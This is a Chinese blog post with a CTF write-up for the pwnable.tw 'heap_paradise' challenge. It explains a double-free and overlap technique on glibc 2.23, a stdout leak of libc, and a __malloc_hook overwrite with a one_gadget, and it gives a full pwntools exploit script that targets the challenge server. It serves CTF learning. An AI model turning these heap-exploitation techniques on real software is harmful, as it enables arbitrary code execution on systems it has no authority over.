【tw】heap_paradise

最新推荐文章于 2023-08-29 17:14:03 发布
最新推荐文章于 2023-08-29 17:14:03 发布
阅读量221 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/114258867
版权
程序

在这里插入图片描述
程序流程很简单,最多16次 add 的机会,size < 0x78,add 时读入数据。
在这里插入图片描述
delete 时很明显的一个 free 指针未置空。

利用条件和限制
  • libc 2.23
  • add 次数有限制,size <= 0x78,不能直接构造 unsorted bin
  • free 指针未置空
利用思路

因为堆布局半天没想出来,所以参考了一波 ~ 甚是巧妙
我最开始想到的是因为不能直接构造进入 unsorted bin 的 chunk,所以首先在堆块内布置好 fake size 和 fake next size 然后通过 double free 修改 fd 指向布置好的 fake chunk 处,制造堆块的 overlap,然后在 add 时即可对 overlap chunk 的 size 进行修改,free 后可以进入 unsorted bin,但是利用 add 的次数会比较多,所以学习了如下制造 unsorted bin 方法:

  • 通过布置好 fake size 和 fake next size,这里在 chunk #1 中要布置两个 fake next size,一个是修改 fd 进入 fastbin 链表时的,一个是修改 size 后 free 进入 unsorted bin 中的,这样进入 fastbin 链表和进入 unsorted bin 都利用了同一个 chunk,节约了 add 次数
	Allocate(0x68, 'f' * 0x10 + p64(0) + p64(0x71)) # 0
	Allocate(0x68, 'a' * 0x10 + p64(0) + p64(0x31) + 'a' * 0x20 + p64(0) + p64(0x21)) # 1
	Free(0)
	Free(1)
	Free(0)
	Allocate(0x68, '\x20') # 2
	Allocate(0x68, '\x00') # 3
	Allocate(0x68, '\x00') # 4
	Allocate(0x68, '\x00') # 5  fake chunk in chunk #0
	Free(0)
	Allocate(0x68, 'd' * 0x10 + p64(0) + p64(0xa1)) #6 same as #0
	# unsorted bin
	Free(5)

在这里插入图片描述

  • 因为没有 show 功能,所以需要打 IO_stdout 来进行输出,先将 #0 #1 正常放入 fastbin,然后从 unsorted bin 中切割,此时 overlap chunk #1,将 #1 原本指向 #0 的 fd 指向地址末位为 ‘\xa0’ 处,这里是 unsorted bin 切割 0x80 后余下 chunk 的地址,所以此时该 chunk fd 指向了 libc 中的地址,伪造 fake size,同时和 #1 overlap,所以通过申请原 #1 就可以修改其 fd 指向 stdout
	Free(0)
	Free(1)

	Allocate(0x78, 'f' * 0x40 + p64(0) + p64(0x71) + '\xa0' ) # 7
	Free(7)

	Allocate(0x68, 'b' * 0x20 + p64(0) + p64(0x71) + p64(libc.symbols['_IO_2_1_stdout_'] - 0x43)[:2]) # 8

	Allocate(0x68, '\x00') # 9

	# _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING
	Allocate(0x68, '\x00' * 3 + p64(0) * 6 + p64(0xfbad2087 + 0x1800) + p64(0) * 3 + '\x80') # 10

	if(u64(rc(8)) != 0):
		raise Exception('no leak')
    	# exit(0)

	libc_base = u64(rc(8)) - libc.symbols['_IO_2_1_stdin_']
	log.success('libc_addr: ' + hex(libc_base))

	main_arena_addr = libc_base + libc.symbols['__malloc_hook'] + 0x10
	log.success('main_arena_addr: ' + hex(main_arena_addr))

在这里插入图片描述在这里插入图片描述

  • 最后还是通过 overlap #1 来修改其 fd 指向 malloc_hook - 0x23,覆写为 one_gadget 完成攻击
	Free(1)
	Allocate(0x78, 'c' * 0x40 + p64(0) + p64(0x71) + p64(main_arena_addr - 0x33)) # 11

	Allocate(0x68, '\x00') # 12
	if sys.argv[1] == "p":
	   one_gadget = libc_base + 0xf0364
	else:
		one_gadget = libc_base + 0xef6c4
	# one_gadget = libc_base + 0xf0364
	Allocate(0x68, 'z' * 0x13 + p64(one_gadget)) # 13
	dbg()

	sla('You Choice:', '1')
	sla('Size :', str(8))
完整exp
from pwn import *
import sys

context.log_level = "debug"
elf = ELF("./heap_paradise")

if sys.argv[1] == "p":
	p = process("./heap_paradise")
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	libc = elf.libc
else:
	p = remote("chall.pwnable.tw",10308)
	libc = ELF("./libc_64.so.6")

DEBUG = 0
if DEBUG:
	gdb.attach(p, 
	'''	
	b *0x08048935
	c
	''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "You Choice:"
def cmd(idx):
	ru(menu)
	sl(str(idx))

def Allocate(size, data):
	cmd(1)
	ru("Size :")
	sl(str(size))
	ru("Data :")
	se(data)

def Free(idx):
	cmd(2)
	ru("Index :")
	sl(str(idx))

def pwn():
	Allocate(0x68, 'f' * 0x10 + p64(0) + p64(0x71)) # 0
	Allocate(0x68, 'a' * 0x10 + p64(0) + p64(0x31) + 'a' * 0x20 + p64(0) + p64(0x21)) # 1
	Free(0)
	Free(1)
	Free(0)

	Allocate(0x68, '\x20') # 2
	Allocate(0x68, '\x00') # 3
	Allocate(0x68, '\x00') # 4
	Allocate(0x68, '\x00') # 5

	Free(0)

	Allocate(0x68, 'd' * 0x10 + p64(0) + p64(0xa1)) # 6 same as #0

	# unsorted bin
	Free(5)

	Free(0)
	Free(1)

	Allocate(0x78, 'f' * 0x40 + p64(0) + p64(0x71) + '\xa0' ) # 7
	Free(7)

	Allocate(0x68, 'b' * 0x20 + p64(0) + p64(0x71) + p64(libc.symbols['_IO_2_1_stdout_'] - 0x43)[:2]) # 

	Allocate(0x68, '\x00') # 9

	# _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING
	Allocate(0x68, '\x00' * 3 + p64(0) * 6 + p64(0xfbad2087 + 0x1800) + p64(0) * 3 + '\x80') # 10

	if(u64(rc(8)) != 0):
		raise Exception('no leak')
    	# exit(0)

	libc_base = u64(rc(8)) - libc.symbols['_IO_2_1_stdin_']
	log.success('libc_addr: ' + hex(libc_base))

	main_arena_addr = libc_base + libc.symbols['__malloc_hook'] + 0x10
	log.success('main_arena_addr: ' + hex(main_arena_addr))

	Free(1)
	Allocate(0x78, 'c' * 0x40 + p64(0) + p64(0x71) + p64(main_arena_addr - 0x33)) # 11

	Allocate(0x68, '\x00') # 12
	if sys.argv[1] == "p":
	   one_gadget = libc_base + 0xf0364
	else:
		one_gadget = libc_base + 0xef6c4
	# one_gadget = libc_base + 0xf0364
	Allocate(0x68, 'z' * 0x13 + p64(one_gadget)) # 13
	dbg()

	sla('You Choice:', '1')
	sla('Size :', str(8))
	ia()

while True:
	p = process("./heap_paradise")
	# pwn()

	try:
		p = process("./heap_paradise")
		# p = remote("chall.pwnable.tw",10308)
		pwn()
	except:
		p.close()

在这里插入图片描述

、皮皮鸭
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FreeRTOS基础二:内存管理之heap_4方案
luliplus的博客
04-07 5048
简介 heap_4方案也是要定义一个全局数组ucHeap,用于当做内存池,其大小在FreeRTOSConfig.h中使用configTOTAL_HEAP_SIZE 来定义。heap_4方案在绝大多数情况下都优于标准库中的malloc()和free()函数。 /* Allocate the memory for the heap. */ #if( configAPPLICATION_ALLOCATED_HEAP == 1 ) /* The application writer has already
mysql tmp_table_size和max_heap_table_size大小配置
01-19
(实际起限制作用的是tmp_table_size和max_heap_table_size的最小值。)如果内存临时表超出了限制,MySQL就会自动地把它转化为基于磁盘的MyISAM表,存储在指定的tmpdir目录下,默认: mysql> show variables like ...
House of orange
tbsqigongzi的博客
08-07 982
题目中不存在 free 函数或其他释放块的函数。
(优先队列)的基本操作
ParadiseHeaven的博客
12-14 442
(优先队列)的基本操作 是一棵完全二叉树,所以可以利用数组来实现。 以1号作为root,则对于数组中的任意一个i,其左儿子在(2*i),右儿子在(2*i+1),父亲在(i/2)。 下面以最小为例,实现一些基本操作: 1.的声明 2.PercolateUp, PercolateDown 3.Insert 4.DeleteMin
FreeRTOS Heap_1、Heap_2、Heap_3、Heap_4、Heap_5的区别
qq_21513281的博客
11-10 4123
FreeRTOS提供了五种内存管理的方式,下文将对以下五种内存分配进行说明: 1.Heap_1 Heap_1 大小通过FreeRTOSConfig.h中的configTOTAL_HEAP_SIZE定义设置,在源码通过数组的总大小configTOTAL_HEAP_SIZE(bytes)定义设置,允许使用pvPortMalloc(),但没有实现vPortFree()。 当调用pvPortMalloc()时,heap_1分配方案将一个简单数组细分为更小的块。这个数组被称为FreeRTOS。 每个创建的
mysql max_heap_table_size,更改MySQL中的max_heap_table_size值?
weixin_36080842的博客
03-17 6321
max_heap_table_size是同时具有读/写属性的系统变量。最初,max_heap_table_size的大小为16 MB。首先,检查max_heap_table_size的值(以字节为单位)。查询如下-mysql>select@@max_heap_table_size;以下是输出-+-----------------------+|@@max_heap_table_size...
Mysql max_heap_table_size参数
hbhe0316的专栏
11-27 2787
官网连接:https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.htmlhttps://www.cndba.cn/hbhe0316/article/22621 这个变量设置用户创建的MEMORY表允许增长的最大大小。该变量的值用于计算内存表MAX_ROWS值。设置这个变量对任何现有的MEMORY表都没有影响...
FreeRTOS 之 heap_4 踩坑之路
专注于 IOT 物联网的嵌入式研发
01-19 2347
参考博文连接: FreeRTOS系列 – heap_4.c 内存管理分析 FreeRTOS Heap 1_2_3_4_5 比较 示例工程代码库地址如下: Gitee Git 1. 问题描述 博主在使用 heap_4 的 pvPortMalloc 和 vPortFree 内存操作函数时, 遇到个奇怪问题,即:调用 vPortFree 函数不能正常释放内存 FreeRTOSConfig.h #define configASSERT( x ) \ if( ( x ) == 0 ) { \ task
ptmalloc源码分析 - 分配区heap_info结构实现(05)
热门推荐
自娱自乐的代码人
08-29 1万+
我们讲解了多线程环境下,面对线程之间的竞争,ptmalloc除了主分配区外,还会去创建非主分配区。因为线程在调用malloc的时候,首先会去获取一个分配区,如果当前的分配区都被锁定并且没有新的分配区可用的时候,ptmalloc就会去创建一个新的。中主要是创建一个新的分配区,该分配区主要是非主分配区类型。主分配区在ptmalloc_init中初始化,并且设置了全局变量main_arena的值。(size_t size, size_t top_pad):创建一个新的非主分配区。一、heap_info是什么?
rt-thread源码分析篇八:rt_system_heap_init函数分析
OnlyLove_的博客
08-22 2073
一、前言 rt_system_heap_init被rt_hw_board_init调用。 rt_system_heap_init((void *)HEAP_BEGIN, (void *)HEAP_END); 二、参数分析 #define STM32_SRAM_SIZE 64 #define STM32_SRAM_END (0x20000000 + STM32_SRAM_SIZE * 1024) extern int Image$$RW_IRAM1$$ZI$$Limit; #define HEAP_BEG
嵌入式heap_size大小设置
u014694105的博客
05-12 4711
嵌入式heap_size大小设置 一般的单片机在启动文件都有一个heap_size大小配置: 以STM32为例,这个数值设置的大,会导致后面跑裸机的时候容易出现内存报错,如果没有用到标准库的malloc,这个值是可以设置为0的。这样跑裸机就可以片内有多少SRAM就用多少SRAM。 ...
heap_java_heap_
10-01
Java内存是Java虚拟机(JVM)管理的主要内存区域之一,主要用于存储对象实例和数组。在Java程序运行过程中,大部分对象都在上分配内存。理解Java内存的工作原理对于优化程序性能、防止内存泄漏以及解决内存...
DataStructure_Heap_heapsort_heap_Datastructure_made_
10-04
在C++中实现数据结构,通常会利用STL中的`<queue>`库中的`make_heap`、`push_heap`、`pop_heap`和`sort_heap`等函数来操作。这些函数可以帮助我们快速地构建、修改和处理。 `heapsort`是一种基于的数据排序...
unityheapprofiler_heap_unity_
09-29
Unity Heap Profiler是Unity引擎内置的一个强大的性能分析工具,它专用于检测和优化游戏或应用内存使用情况。在Unity开发过程中,有效地管理内存是至关重要的,因为内存占用过多可能导致性能下降,甚至在某些设备上...
【pwn】orw
weixin_43960998的博客
06-19 1750
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1299
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 666
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 537
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
【笔记】pwn模板
weixin_43960998的博客
02-21 504
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
heap_caps_malloc
最新发布
09-13
heap_caps_malloc是一个用于动态内存分配的函数,它在特定的上分配内存。 在嵌入式系统或者其他资源受限的环境中,常常需要对内存进行精确的管理。heap_caps_malloc函数允许开发者在不同的之间进行选择,以便更...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值